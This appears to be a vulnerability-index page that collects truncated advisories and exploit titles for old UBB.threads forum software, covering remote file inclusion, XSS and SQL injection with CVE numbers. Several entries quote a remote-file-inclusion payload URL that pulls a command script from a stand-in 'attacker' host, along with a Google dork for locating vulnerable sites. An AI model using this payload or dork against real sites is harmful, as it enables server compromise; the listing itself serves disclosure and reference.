UBB.threads Multiple input validation error

Hello,, UBB.threads Multiple input validation error Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] Tested on Version 6 6.5.1.1 and other versions maybe affected Remote File including :...

UBBCentral UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution

!/usr/bin/php -q -d shortopentag=on ? // UBB.threads Multiple input validation error // Discovered By : HACKERS PAL // Copy rights : HACKERS PAL // Website : http://www.soqor.net // Email Address : [email protected] // Tested on Version 6 6.5.1.1 and other versions maybe affected // Remote File...

UBB.threads ubbthreads.php debug Parameter XSS

The version of UBB.threads installed on the remote host fails to sanitize input to the 'debug' parameter before using it in the 'ubbthreads.php' script for dynamically-generated content. Regardless of any PHP settings, an unauthenticated attacker may be able to exploit this flaw to inject arbitra...

UBB.threads addpost_newpoll.php thispath Parameter Remote File Inclusion

The version of UBB.threads installed on the remote host fails to sanitize input to the 'thispath' parameter before using it in a PHP include function in the 'addpostnewpoll.php' script. Provided PHP's 'registerglobals' setting is enabled, an unauthenticated attacker may be able to exploit this fl...

Remote file inclusion

PHP remote file inclusion vulnerability in addpostnewpoll.php in UBB.threads 6.4 through 6.5.2 and 6.5.1.1 trial allows remote attackers to execute arbitrary PHP code via a URL in the thispath parameter...

CVE-2006-2568

UBB.threads vulnerability CVE-2006-2568 is a remote file inclusion in addpost_newpoll.php, where the thispath parameter is consumed by PHP include() without proper sanitization. Affected versions are UBB.threads 6.4 through 6.5.2 and 6.5.1.1 (trial). Exploitation can enable an attacker to view ar...

CVE-2006-2568

PHP remote file inclusion vulnerability in addpostnewpoll.php in UBB.threads 6.4 through 6.5.2 and 6.5.1.1 trial allows remote attackers to execute arbitrary PHP code via a URL in the thispath parameter...

UBB.threads >= 6.4.x Remote File Inclusion

Anomaly 1n The System presents UBB.threads = 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit: /addpostnewpoll.php?addpoll=preview&thispath=http://attacker/cmd.gif?&cmd=id contact: irc.gigachat.net A1TS milw0rm.c...

UBBCentral UBB.Threads 6.4.x 6.5.2 - thispath Remote File Inclusion

UBBCentral UBB.Threads 6.4.x 6.5.2 - thispath Remote File Inclusion Anomaly 1n The System presents UBB.threads = 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit:...

UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion

Anomaly 1n The System presents UBB.threads = 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit: /addpostnewpoll.php?addpoll=preview&thispath=http://attacker/cmd.gif?&cmd=id contact: irc.gigachat.net A1TS milw0rm.c...

Sql injection

SQL injection vulnerability in showflat.php in UBB.threads 5.5.1, 6.0 br5, 6.0.1, 6.0.2, and earlier, allows remote attackers to execute arbitrary SQL commands via the Number parameter...

CVE-2006-1423

SQL injection vulnerability in showflat.php in UBB.threads 5.5.1, 6.0 br5, 6.0.1, 6.0.2, and earlier, allows remote attackers to execute arbitrary SQL commands via the Number parameter...

CVE-2006-1423

CVE-2006-1423 corresponds to a SQL injection vulnerability in showflat.php of UBB.threads (versions 5.5.1, 6.0 br5, 6.0.1, 6.0.2 and earlier). The issue allows remote attackers to inject arbitrary SQL through the Number parameter, enabling potential unauthorized database access. Connected sources...

CVE-2006-1423

SQL injection vulnerability in showflat.php in UBB.threads 5.5.1, 6.0 br5, 6.0.1, 6.0.2, and earlier, allows remote attackers to execute arbitrary SQL commands via the Number parameter...

Sql injection

SQL injection vulnerability in showflat.php in Groupee formerly known as Infopop UBB.threads 6.3 and earlier allows remote attackers to execute arbitrary SQL commands via the Number parameter...

CVE-2006-0545

SQL injection vulnerability in showflat.php in Groupee formerly known as Infopop UBB.threads 6.3 and earlier allows remote attackers to execute arbitrary SQL commands via the Number parameter...

CVE-2006-0545

The CVE-2006-0545 entry describes an SQL injection in showflat.php of UBB.threads (Groupee, formerly Infopop) version 6.3 and earlier. The vulnerability allows remote attackers to craft the Number parameter to execute arbitrary SQL commands, enabling potential data disclosure or modification. Aff...

CVE-2006-0545

SQL injection vulnerability in showflat.php in Groupee formerly known as Infopop UBB.threads 6.3 and earlier allows remote attackers to execute arbitrary SQL commands via the Number parameter...

UBBCentral UBB.Threads 6.3 - showflat.php SQL Injection

UBBCentral UBB.Threads 6.3 - showflat.php SQL Injection source: https://www.securityfocus.com/bid/16520/info UBB.Threads is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successf...

UBBCentral UBB.Threads 6.3 - 'showflat.php' SQL Injection

source: https://www.securityfocus.com/bid/16520/info UBB.Threads is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could allow an attacker to compromise th...